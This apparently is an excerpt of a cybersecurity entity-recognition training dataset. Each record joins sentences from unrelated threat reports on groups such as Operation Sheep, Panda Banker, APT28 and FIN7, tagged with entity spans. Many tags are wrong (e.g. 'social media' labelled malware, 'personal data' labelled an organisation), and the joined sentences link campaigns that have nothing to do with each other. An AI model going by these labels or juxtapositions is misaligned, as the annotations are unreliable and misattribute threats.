After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . In theory , Shun Wang Technologies could have collected a third of China’s population names and contact numbers if not more . With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November’s Single’s Day and December’s Asian online shopping fest . This paper will cover the discovery of this campaign , dubbed ‘Operation Sheep’ , and an analysis of SWAnalytics . In mid-September , an app named ‘Network Speed Master’ stood out on our radar with its rather unusual behavior patterns . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in . With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . 
Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” . In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months . In China alone , we have seen underground market sheep shavers” ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . In Operation Sheep’s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before . Japan is no stranger to banking malware . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan . Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media . we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems . we found two malicious iOS applications in Operation Pawn Storm . 
One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server .", "spans": {"ORGANIZATION: Kaspersky": [[14, 23]], "THREAT_ACTOR: DarkHotel": [[146, 155]], "ORGANIZATION: ITUC": [[186, 190]], "THREAT_ACTOR: Operation Kingphish": [[216, 235]], "MALWARE: social media": [[269, 281]], "MALWARE: prominently Facebook": [[284, 304]], "THREAT_ACTOR: Operation Sheep": [[635, 650], [2870, 2885]], "THREAT_ACTOR: ‘Operation Sheep’": [[868, 885], [2023, 2040]], "VULNERABILITY: exploit": [[972, 979], [1782, 1789]], "VULNERABILITY: Man-in-the-Disk": [[984, 999]], "MALWARE: SDK": [[1071, 1074]], "FILEPATH: SWAnalytics": [[1083, 1094], [1314, 1325], [2403, 2414], [2458, 2469], [2786, 2797], [3044, 3055], [3223, 3234]], "SYSTEM: Android": [[1133, 1140], [2491, 2498]], "ORGANIZATION: Tencent MyApp": [[1210, 1223]], "ORGANIZATION: Wandoujia": [[1226, 1235]], "ORGANIZATION: Huawei App Store": [[1238, 1254]], "ORGANIZATION: Xiaomi App Store": [[1261, 1277]], "THREAT_ACTOR: Shun Wang": [[1517, 1526], [1671, 1680], [3833, 3842]], "THREAT_ACTOR: ‘Network Speed Master’": [[2108, 2130]], "FILEPATH: module": [[2203, 2209]], "FILEPATH: malicious sample": [[2597, 2613]], "FILEPATH: SWAnalytics’": [[3355, 3367]], "THREAT_ACTOR: sheep shavers”": [[3705, 3719]], "FILEPATH: Batmobi": [[4036, 4043]], "FILEPATH: Duapps": [[4046, 4052]], "FILEPATH: Cheetah SDK": [[4071, 4082]], "THREAT_ACTOR: actor": [[4116, 4121]], "MALWARE: Panda Banker": [[4136, 4148]], "ORGANIZATION: Arbor": [[4213, 4218]], "FILEPATH: Panda Banker": [[4289, 4301], [4381, 4393], [4604, 4616]], "FILEPATH: banking": [[4427, 4434]], "FILEPATH: malware": [[4435, 4442]], "FILEPATH: Ursnif": [[4521, 4527]], "FILEPATH: Urlzone": [[4532, 4539]], "ORGANIZATION: financial institutions": [[4652, 
4674]], "THREAT_ACTOR: Operation Pawn Storm": [[4686, 4706]], "ORGANIZATION: economic": [[4720, 4728]], "ORGANIZATION: political": [[4733, 4742]], "ORGANIZATION: military": [[4818, 4826]], "ORGANIZATION: governments": [[4829, 4840]], "ORGANIZATION: defense industries": [[4843, 4861]], "ORGANIZATION: media": [[4872, 4877]], "FILEPATH: SEDNIT": [[4992, 4998]], "ORGANIZATION: Microsoft": [[5025, 5034]], "FILEPATH: XAgent": [[5134, 5140]], "FILEPATH: IOS_XAGENT.A": [[5153, 5165]], "FILEPATH: MadCap": [[5225, 5231]], "FILEPATH: XAGENT.B": [[5249, 5257]], "THREAT_ACTOR: SEDNIT-related": [[5284, 5298]], "ORGANIZATION: personal data": [[5319, 5332]]}, "info": {"id": "cyberner_stix_train_004164", "source": "cyberner_stix_train"}} {"text": "This example is from a later version of EventBot , and in other versions the naming convention is very similar , with bot IDs such as word100 , word101 , word102 , and test2005 , test2006 etc . Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before . This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 .", "spans": {"MALWARE: EventBot": [[40, 48]], "MALWARE: Panda Banker": [[261, 273]], "THREAT_ACTOR: Rocket Kitten": [[323, 336]]}, "info": {"id": "cyberner_stix_train_004165", "source": "cyberner_stix_train"}} {"text": "We assess with high confidence that this modified version is operated by the infamous Wolf Research . The attacker is from North Korea . This research paper will delve into another prominent group of attackers referred to as “ IXESHE ” ( pronounced “ i-sushi ” ) , based on one of the more common detection names security companies use for the malware they utilize . 
Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": {"ORGANIZATION: Wolf Research": [[86, 99]], "THREAT_ACTOR: IXESHE": [[227, 233]], "SYSTEM: CSP": [[433, 436]]}, "info": {"id": "cyberner_stix_train_004166", "source": "cyberner_stix_train"}} {"text": "This time resets every time the user performs some activity . During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts . DDKONG Plugin : File Name : H istory.nls . Mandiant identified the historical execution of malicious binaries across multiple systems using cdhash values stored in the XPdb .", "spans": {"THREAT_ACTOR: group": [[90, 95]], "TOOL: Powermud": [[172, 180]], "THREAT_ACTOR: Seedworm group": [[209, 223]], "TOOL: customized PowerShell": [[230, 251]], "TOOL: LaZagne": [[254, 261]], "TOOL: Crackmapexec scripts": [[268, 288]], "MALWARE: DDKONG": [[291, 297]], "FILEPATH: H istory.nls": [[319, 331]], "MALWARE: malicious binaries": [[382, 400]], "SYSTEM: multiple systems": [[408, 424]]}, "info": {"id": "cyberner_stix_train_004167", "source": "cyberner_stix_train"}} {"text": "Take voice call playback process for example . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . However the unflattening of ANEL code had to be performed in the later maturity level since the assignment of block comparison variable heavily depends on opaque predicates . 
The first script is the RAW data the retrieved from the JS file and the second one is the decoded one .", "spans": {"VULNERABILITY: Carbanak": [[75, 83]], "ORGANIZATION: banks": [[117, 122]], "MALWARE: ANEL": [[268, 272]]}, "info": {"id": "cyberner_stix_train_004168", "source": "cyberner_stix_train"}} {"text": "] com , points to the IP address 54.69.156.31 which serves a self-signed TLS certificate with the certificate common name MyCert and fingerprint 11:41:45:2F : A7:07:23:54 : AE:9A : CE : F4 : FE:56 : AE : AC : B1 : C2:15:9F:6A : FC:1E : CC:7D : F8:61 : E3:25:26:73:6A . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 . Decodes the Base64 payload and writes the file to C:\\ProgramData\\IntegratedOffice.exe . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": {"FILEPATH: C:\\ProgramData\\IntegratedOffice.exe": [[421, 456]], "MALWARE: OT malware": [[488, 498]]}, "info": {"id": "cyberner_stix_train_004169", "source": "cyberner_stix_train"}} {"text": "At the time of writing , Locky ransomware remains their malware of choice , even as the group continues to experiment with a variety of additional malware .", "spans": {"MALWARE: Locky": [[25, 30]]}, "info": {"id": "cyberner_stix_train_004170", "source": "cyberner_stix_train"}} {"text": "In case of failure , it will sleep for three seconds and try again .", "spans": {}, "info": {"id": "cyberner_stix_train_004171", "source": "cyberner_stix_train"}} {"text": "In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group’s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . 
In early August , Unit 42 identified two attacks using similar techniques .", "spans": {"ORGANIZATION: 360 Core Security": [[22, 39]], "THREAT_ACTOR: APT-C-06": [[72, 80]], "VULNERABILITY: (CVE-2018-8174)": [[132, 147]], "ORGANIZATION: Unit 42": [[180, 187]]}, "info": {"id": "cyberner_stix_train_004172", "source": "cyberner_stix_train"}} {"text": "Those targeted include Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia .", "spans": {"SYSTEM: Paypal Business": [[23, 38]], "SYSTEM: Revolut": [[41, 48]], "SYSTEM: Barclays": [[51, 59]], "SYSTEM: UniCredit": [[62, 71]], "SYSTEM: CapitalOne UK": [[74, 87]], "SYSTEM: HSBC UK": [[90, 97]], "SYSTEM: Santander UK": [[100, 112]], "SYSTEM: TransferWise": [[115, 127]], "SYSTEM: Coinbase": [[130, 138]], "SYSTEM: paysafecard": [[141, 152]], "MALWARE: Filensfer": [[199, 208]], "ORGANIZATION: government": [[326, 336]], "ORGANIZATION: energy": [[339, 345]], "ORGANIZATION: technology sectors": [[352, 370]]}, "info": {"id": "cyberner_stix_train_004173", "source": "cyberner_stix_train"}} {"text": "However , analysts may not always see the indicators of compromise in the server ’ s response . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer . 
The protection is enabled to all processes except for ones in the following list : Svchost.exe , Lsass.exe , Winlogon.exe , Services.exe , Csrss.exe , ctfmon.exe , Rundll32.exe , mpnotify.exe , update.exe . The first with a valid handle to close the process created .", "spans": {"ORGANIZATION: labor rights advocates": [[180, 202]], "ORGANIZATION: foreign policy institutions": [[224, 251]], "FILEPATH: Svchost.exe": [[444, 455]], "FILEPATH: Lsass.exe": [[458, 467]], "FILEPATH: Winlogon.exe": [[470, 482]], "FILEPATH: Services.exe": [[485, 497]], "FILEPATH: Csrss.exe": [[500, 509]], "FILEPATH: ctfmon.exe": [[512, 522]], "FILEPATH: Rundll32.exe": [[525, 537]], "FILEPATH: mpnotify.exe": [[540, 552]], "FILEPATH: update.exe": [[555, 565]]}, "info": {"id": "cyberner_stix_train_004174", "source": "cyberner_stix_train"}} {"text": "On the other hand , dynamic analysis tools ( like debuggers or sandbox ) face the anti-debug and anti-analysis tricks hidden in the virtualized code itself that detects sandbox environments and alters the behavior of the malware . All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong . It is impossible to start analyzing every piece of software we run , especially with all the regular updates we are encouraged or required to install . TIEDYE can communicate with a C2 server using a range of supported protocols described as follows .", "spans": {"TOOL: Emissary": [[242, 250]], "SYSTEM: C2 server": [[536, 545]]}, "info": {"id": "cyberner_stix_train_004175", "source": "cyberner_stix_train"}} {"text": "The attack group has made incremental changes to ZeroT since our last analysis .", "spans": {"MALWARE: ZeroT": [[49, 54]]}, "info": {"id": "cyberner_stix_train_004176", "source": "cyberner_stix_train"}} {"text": "The following are the three files:Defender.sct – The malicious JavaScript based scriptlet file . 
Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide .", "spans": {"MALWARE: files:Defender.sct": [[28, 46]], "MALWARE: scriptlet": [[80, 89]], "MALWARE: file": [[90, 94]], "FILEPATH: Ploutus-D": [[103, 112], [185, 194]], "ORGANIZATION: ATM vendors": [[236, 247]]}, "info": {"id": "cyberner_stix_train_004177", "source": "cyberner_stix_train"}} {"text": "About 57 % of these devices are located in Asia and about 9 % are in Europe . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities . and so forth . Further analysis of COSMICENERGY is available as part of .", "spans": {"THREAT_ACTOR: APT38": [[98, 103]], "ORGANIZATION: banking": [[220, 227]], "MALWARE: COSMICENERGY": [[277, 289]]}, "info": {"id": "cyberner_stix_train_004178", "source": "cyberner_stix_train"}} {"text": "The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL .", "spans": {"MALWARE: Zebrocy": [[4, 11]], "MALWARE: Trojan": [[12, 18]], "TOOL: C2": [[80, 82]]}, "info": {"id": "cyberner_stix_train_004179", "source": "cyberner_stix_train"}} {"text": "Figure 4 . Group-IB experts continuously monitor the Silence’ activities . Get system information .", "spans": {"ORGANIZATION: Group-IB": [[11, 19]], "THREAT_ACTOR: Silence’": [[53, 61]]}, "info": {"id": "cyberner_stix_train_004180", "source": "cyberner_stix_train"}} {"text": "In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike . 
According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website .", "spans": {"THREAT_ACTOR: Cobalt Hacking Group": [[42, 62]], "TOOL: Cobalt Strike": [[184, 197]], "ORGANIZATION: Myanmar Union Election Commission": [[471, 504]], "ORGANIZATION: UEC": [[507, 510]]}, "info": {"id": "cyberner_stix_train_004181", "source": "cyberner_stix_train"}} {"text": "As the same name suggests , the artifact appears in fact to act as a tunnel for the attacker to remotely access the internal network and maintain persistence .", "spans": {}, "info": {"id": "cyberner_stix_train_004182", "source": "cyberner_stix_train"}} {"text": "However , no command is received from the C2 until the inactiveTime field ( see beaconing information image above ) has at least the value of 2000000 . Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests . DDKONG Plugin : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"THREAT_ACTOR: Seedworm": [[152, 160]], "THREAT_ACTOR: cyber espionage group": [[183, 204]], "MALWARE: DDKONG": [[287, 293]], "TOOL: DLL": [[333, 336]], "SYSTEM: MS Windows": [[356, 366]], "ORGANIZATION: Talos researchers": [[369, 386]], "TOOL: Open Babel": [[435, 445]]}, "info": {"id": "cyberner_stix_train_004183", "source": "cyberner_stix_train"}} {"text": "Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . 
The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": {"ORGANIZATION: Kaspersky": [[13, 22]], "MALWARE: backdoor": [[40, 48]], "THREAT_ACTOR: Turla": [[93, 98]], "VULNERABILITY: exploit": [[105, 112]], "VULNERABILITY: CVE-2018-4878": [[140, 153]], "THREAT_ACTOR: attacker": [[166, 174]]}, "info": {"id": "cyberner_stix_train_004184", "source": "cyberner_stix_train"}} {"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States . With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate .", "spans": {"THREAT_ACTOR: group": [[22, 27]], "ORGANIZATION: maritime": [[54, 62]], "ORGANIZATION: research institutes": [[128, 147]], "ORGANIZATION: academic organizations": [[150, 172]], "ORGANIZATION: private firms": [[179, 192]], "MALWARE: GozNym": [[221, 227]], "ORGANIZATION: bank": [[278, 282]], "MALWARE: URL": [[286, 289]], "MALWARE: SSL certificate": [[294, 309]]}, "info": {"id": "cyberner_stix_train_004185", "source": "cyberner_stix_train"}} {"text": "] comaccount-manager [ . Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials . The first zone we became aware of was “ hugesoft.org ” , which was registered through eNom , Inc. in October 2004 . 
Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Palo Alto Networks": [[25, 43]], "TOOL: Infy": [[215, 219], [267, 271]], "TOOL: Infy M.": [[224, 231]], "TOOL: malware": [[282, 289]], "TOOL: keylogger": [[323, 332]], "DOMAIN: hugesoft.org": [[417, 429]]}, "info": {"id": "cyberner_stix_train_004186", "source": "cyberner_stix_train"}} {"text": "Previous reports alleged this surveillanceware tool was deployed using ‘ honey traps ’ where the actor behind it would reach out to targets via fake social media profiles of young women . Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims . The first service name that is not installed on the system becomes the ZxShell service name . The MOVEit data breaches had widespread impacts , affecting everything from the Oregon DMV and Louisiana OMV ( Office of Motor Vehicles)—including the leak of nearly 10 million drivers ' licenses — to the University of Rochester and multiple corporations .", "spans": {"MALWARE: ZxShell": [[436, 443]], "TOOL: MOVEit": [[463, 469]], "ORGANIZATION: Oregon DMV": [[539, 549]], "ORGANIZATION: and Louisiana OMV": [[550, 567]], "ORGANIZATION: University of Rochester": [[664, 687]], "ORGANIZATION: multiple corporations": [[692, 713]]}, "info": {"id": "cyberner_stix_train_004187", "source": "cyberner_stix_train"}} {"text": "By using Google Cloud Messaging botnet owners can operate without a C & C server , thus eliminating the threat of the botnet being detected and blocked by law enforcement authorities . Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator . The log file is encrypted using the same algorithm as the one used to encrypt static strings from the module . 
Open Babel allows users to “ search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , ” according to its website , and is used in other popular pieces of software in the science field .", "spans": {"SYSTEM: Google Cloud Messaging": [[9, 31]], "ORGANIZATION: satellite communications operator": [[259, 292]], "TOOL: Open Babel": [[406, 416]]}, "info": {"id": "cyberner_stix_train_004188", "source": "cyberner_stix_train"}} {"text": "RECEIVE_BOOT_COMPLETED - allow the application to launch itself after system boot . The techniques and modules employed by EvilGnome — that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools—remind us of Gamaredon Group’s Windows tools . Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 .", "spans": {"THREAT_ACTOR: EvilGnome": [[123, 132]], "TOOL: SFX": [[154, 157]], "MALWARE: Windows tools": [[272, 285]]}, "info": {"id": "cyberner_stix_train_004189", "source": "cyberner_stix_train"}} {"text": "This means that the malware can be remotely eliminated by an SMS message . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The threat then executes \" svchost.exe \" .", "spans": {"THREAT_ACTOR: APT37": [[127, 132]], "MALWARE: svchost.exe": [[224, 235]]}, "info": {"id": "cyberner_stix_train_004190", "source": "cyberner_stix_train"}} {"text": "There have been several recent examples of companies choosing to release their software directly to consumers , bypassing traditional storefronts . ESET has been tracking a new version of Machete (the group’s Python-based toolset) that was first seen in April 2018 . 
APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": {"ORGANIZATION: ESET": [[148, 152]], "THREAT_ACTOR: Machete": [[188, 195]], "THREAT_ACTOR: APT37": [[267, 272]], "ORGANIZATION: financial company": [[346, 363]]}, "info": {"id": "cyberner_stix_train_004191", "source": "cyberner_stix_train"}} {"text": "The web shell parameters in this attack match to the China Chopper parameters , as described in FireEye 's analysis of China Chopper . Our research indicates that it has started targeting Japanese users .", "spans": {"THREAT_ACTOR: China Chopper": [[53, 66], [119, 132]], "ORGANIZATION: FireEye": [[96, 103]], "ORGANIZATION: Japanese users": [[188, 202]]}, "info": {"id": "cyberner_stix_train_004192", "source": "cyberner_stix_train"}} {"text": "Back then , CosmicDuke still lacked most of the credential-stealing functionality found in later samples .", "spans": {"MALWARE: CosmicDuke": [[12, 22]]}, "info": {"id": "cyberner_stix_train_004193", "source": "cyberner_stix_train"}} {"text": "Disguised Spyware Uploaded on Google Play Store We identified previously unknown spyware apps being successfully uploaded on Google Play Store multiple times over the course of over two years . Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization . The screenshots are exfiltrated via the ImgBB website . 
The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": {"SYSTEM: Google Play Store": [[30, 47], [125, 142]], "THREAT_ACTOR: OilRig group": [[262, 274]], "TOOL: ImgBB": [[496, 501]], "ORGANIZATION: Harrison": [[535, 543], [637, 645]], "ORGANIZATION: Ashley Madison": [[584, 598]]}, "info": {"id": "cyberner_stix_train_004194", "source": "cyberner_stix_train"}} {"text": "Non-governmental political organizations may provide access to desirable national policy information , especially foreign policy , but may not have the same level of protection and security as governmental organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_004195", "source": "cyberner_stix_train"}} {"text": "Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Their targets are marine companies that operate in and around the South China Sea , an LOC of much Chinese interest .", "spans": {"VULNERABILITY: CVE-2012-0158": [[52, 65]], "TOOL: NetTraveler Trojan": [[77, 95]], "ORGANIZATION: marine companies": [[116, 132]]}, "info": {"id": "cyberner_stix_train_004196", "source": "cyberner_stix_train"}} {"text": "The threat actors used shortened URLs in spear phishing messages and fake news websites to direct targets to download KASPERAGENT .", "spans": {"MALWARE: KASPERAGENT": [[118, 129]]}, "info": {"id": "cyberner_stix_train_004197", "source": "cyberner_stix_train"}} {"text": "However , it ’ s possible the set of commands may change in future versions of the Trojan . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents . 
Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities .", "spans": {"MALWARE: decoy documents": [[96, 111]], "ORGANIZATION: politically": [[162, 173]], "ORGANIZATION: militarily": [[177, 187]], "ORGANIZATION: political": [[247, 256]], "THREAT_ACTOR: TEMP.Periscope": [[328, 342]], "ORGANIZATION: engineering firms": [[431, 448]], "ORGANIZATION: shipping": [[451, 459]], "ORGANIZATION: transportation": [[464, 478]], "ORGANIZATION: manufacturing": [[481, 494]], "ORGANIZATION: defense": [[497, 504]], "ORGANIZATION: government offices": [[507, 525]], "ORGANIZATION: research universities": [[532, 553]]}, "info": {"id": "cyberner_stix_train_004198", "source": "cyberner_stix_train"}} {"text": "Under these conditions , the app continues executing and the intent of targeting Xiaomi devices and users could be inferred , however poorly written code results in execution in more environments than perhaps intended ; further checks are made to ascertain whether the app is running on an emulator , perhaps to evade researcher analysis environments . In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled 中東呼吸器症候 群(MERS)の予防 , ” which translates to Prevention of Middle East Respiratory Syndrome (MERS) . APT28 espionage activity has primarily targeted entities in the U.S. 
, Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"ORGANIZATION: Xiaomi": [[81, 87]], "THREAT_ACTOR: APT41": [[363, 368]], "ORGANIZATION: Japanese media organization": [[380, 407]], "ORGANIZATION: governments": [[683, 694]], "ORGANIZATION: militaries": [[697, 707]], "ORGANIZATION: defense attaches": [[710, 726]], "ORGANIZATION: media entities": [[729, 743]], "ORGANIZATION: dissidents": [[750, 760]], "ORGANIZATION: figures": [[765, 772]], "ORGANIZATION: Russian government": [[796, 814]]}, "info": {"id": "cyberner_stix_train_004199", "source": "cyberner_stix_train"}} {"text": "PCRat S-VULNAME/Gh0st is a payload that we do not see this group using frequently .", "spans": {"VULNERABILITY: PCRat S-VULNAME/Gh0st": [[0, 21]]}, "info": {"id": "cyberner_stix_train_004200", "source": "cyberner_stix_train"}} {"text": "We reverse engineered XLoader and found that it appears to target South Korea-based banks and game development companies . Either way , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . After the reconstruction of the full infection chain , we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company .", "spans": {"MALWARE: XLoader": [[22, 29]], "THREAT_ACTOR: Sofacy's": [[136, 144]]}, "info": {"id": "cyberner_stix_train_004201", "source": "cyberner_stix_train"}} {"text": "Anti-emulator code . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . 
Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm .", "spans": {"THREAT_ACTOR: FIN7": [[94, 98]], "TOOL: malicious Office document": [[155, 180]], "ORGANIZATION: FireEye DTI": [[285, 296]], "ORGANIZATION: FireEye": [[305, 312]], "THREAT_ACTOR: Ke3chang": [[327, 335]]}, "info": {"id": "cyberner_stix_train_004202", "source": "cyberner_stix_train"}} {"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . The malware starts communicating with the C&C server by sending basic information about the infected machine .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: threat actor group": [[10, 28]], "ORGANIZATION: restaurant": [[79, 89]], "ORGANIZATION: services": [[92, 100]], "ORGANIZATION: financial sectors": [[105, 122]], "FILEPATH: malware": [[129, 136]], "TOOL: C&C": [[167, 170]]}, "info": {"id": "cyberner_stix_train_004203", "source": "cyberner_stix_train"}} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Maudi Surveillance Operation which was previously reported in 2013 .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day exploits": [[144, 161]], "THREAT_ACTOR: Attackers": [[203, 212]], "ORGANIZATION: Microsoft": [[223, 232]], "VULNERABILITY: exploit": [[249, 256]], "VULNERABILITY: CVE-2018-0798": [[257, 270]], "THREAT_ACTOR: Maudi": [[349, 354]]}, "info": {"id": "cyberner_stix_train_004204", "source": "cyberner_stix_train"}} {"text": "In addition , it monitors to verify if com.android.music.helper package is removed . 
The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage .", "spans": {"VULNERABILITY: NSA exploits": [[171, 183]], "ORGANIZATION: high-tech": [[248, 257]], "ORGANIZATION: manufacturing": [[262, 275]], "THREAT_ACTOR: DragonOK": [[309, 317]], "ORGANIZATION: economic": [[367, 375]]}, "info": {"id": "cyberner_stix_train_004205", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //www [ . Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder . Several metadata fields ( specifically title , subject , author , comments , manager , and company ) appear to have been populated with different data sets . The top most targeted organizations included those from technology and social media , NATO , and the transportation sector .", "spans": {"THREAT_ACTOR: APT28": [[109, 114]], "TOOL: Responder": [[124, 133]], "ORGANIZATION: technology": [[350, 360]], "ORGANIZATION: social media": [[365, 377]], "ORGANIZATION: NATO": [[380, 384]], "ORGANIZATION: transportation sector": [[395, 416]]}, "info": {"id": "cyberner_stix_train_004206", "source": "cyberner_stix_train"}} {"text": "This is a stark contrast with other attacks commonly associated with the Sofacy group where generally no more than a handful of victims are targeted within a single organization in a focus-fire style of attack .", "spans": {"THREAT_ACTOR: Sofacy": [[73, 79]]}, "info": {"id": "cyberner_stix_train_004207", "source": "cyberner_stix_train"}} {"text": "Trend Micro 's Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies . 
It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "TOOL: leading sandbox": [[91, 106]], "TOOL: machine learning technologies": [[111, 140]], "MALWARE: technical exploitation capabilities": [[172, 207]], "VULNERABILITY: zero-day": [[274, 282]]}, "info": {"id": "cyberner_stix_train_004208", "source": "cyberner_stix_train"}} {"text": "The widespread proliferation and use of the following tools suggest that the group likely has the knowledge and capability to use them as part of its operations :", "spans": {}, "info": {"id": "cyberner_stix_train_004209", "source": "cyberner_stix_train"}} {"text": "These more recent developments indicate that XLoader is still evolving . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . It is worth noting that the IP response observed to set ping mode was the reverse of the IP used to set text mode (i.e., 